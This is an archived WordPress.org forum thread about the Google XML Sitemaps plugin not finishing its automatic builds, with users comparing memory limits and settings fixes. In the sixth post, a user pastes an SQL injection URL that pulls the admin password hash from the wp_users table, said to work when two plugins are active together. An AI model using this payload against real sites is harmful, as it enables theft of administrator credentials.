WordPress.org

Forums

[Plugin: Google XML Sitemaps] Sitemap Generator works manually but needs more memory/time when on au (7 posts)

  1. slobizman
    Member
    Posted 5 years ago #

    I also find my sitemap has not cokmpleted it's daily run. I get a notice like this:

    * The last run didn't finish! Maybe you can raise the memory or time limit for PHP scripts. Learn more
    * The last known memory usage of the script was 47.75MB, the limit of your server is 64M.
    * The last known execution time of the script was 122.41 seconds, the limit of your server is 120 seconds.

    But when I then run it manually, it gives me this ntoice of successful completion:

    # Your sitemap was last built on October 30, 2009, 8:31 am 8:31 am.
    # Your sitemap (zipped) was last built on October 30, 2009, 8:31 am 8:31 am.
    # Google was successfully notified about changes.
    # Bing was successfully notified about changes.
    # Ask.com was successfully notified about changes.
    # It took 8.28 seconds to notify Ask.com, maybe you want to disable this feature to reduce the building time.
    # The building process took about 10.12 seconds to complete and used 40.75 MB of memory.

    Why would it work on manual, and not when running in auto?

    I'm on 2.8.5 and 3.1.7 of the plugin. It's been doing this on ealier releases as well.

    http://wordpress.org/extend/plugins/google-sitemap-generator/

  2. bobinoz
    Member
    Posted 5 years ago #

    Same problem for me, it started a while back and I posted about it here

    Since then I, like you, have discovered that a manual build always works. My site must be much smaller than yours, but on the rare occassions an auto build works, which is about 10% of the time, the build takes around 18 seconds, but a manual build takes between one and three seconds.

    I'm also on 2.8.5 and 3.1.7 of the plugin, using Thesis 1.6.

  3. a_johnson
    Member
    Posted 5 years ago #

    Which web hosting companies are you using?

  4. bobinoz
    Member
    Posted 5 years ago #

    I'm on Hostgator. But I have contacted them about the problem and they say there is nothing their end to prevent the build.

  5. bobinoz
    Member
    Posted 5 years ago #

    Well, it is early days but I think I may have found the problem. The other day I noticed that where it says in the settings for XML Sitemap Generator for WordPress 3.1.7

    Try to increase the memory limit to:

    I had increased mine and set it to 64 but the instructions to the right say (e.g. "4M", "16M").

    So yesterday I changed 64 to 64M and hit update options.

    Since the addition of the M my sitemap has rebuilt itself automatically after I have posted twice, both times without errors and taking just 1.16 seconds the first time and 4.76 seconds the second time. It hasn't worked twice on the trot for a very long time and when it has, it took much longer.

    So try checking your settings to see if you have that M. I'd be interested to hear if it works for anybody else.

  6. Pino262
    Member
    Posted 5 years ago #

    I SOLVED MY PROBLEM AFTER 2 DAYS SEARCHING! My problem was a wrong sitemap integration from Global Translater Plugin and XML-Sitemap Plugin:

    If this aint your problem try increasing your memory or learn .htacces
    If it is look, down here now.

    GO TO YOURSITE.COM/wp-admin/options-general.php?page=global-translator/options-translator.php

    Now scroll a bit down and uncheck this: Enable sitemap integration

    Also some1 at my school found this sql injection attack wich is availbe when both plugins are activated. here it is

    /wp/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),
    666,CHAR(58))+FROM+wp_users+where+id=1/*
  7. iranibazar
    Member
    Posted 4 years ago #

    i am using 3.0.1 but i have not this file : options-translator.php

Topic Closed

This topic has been closed to new replies.

About this Topic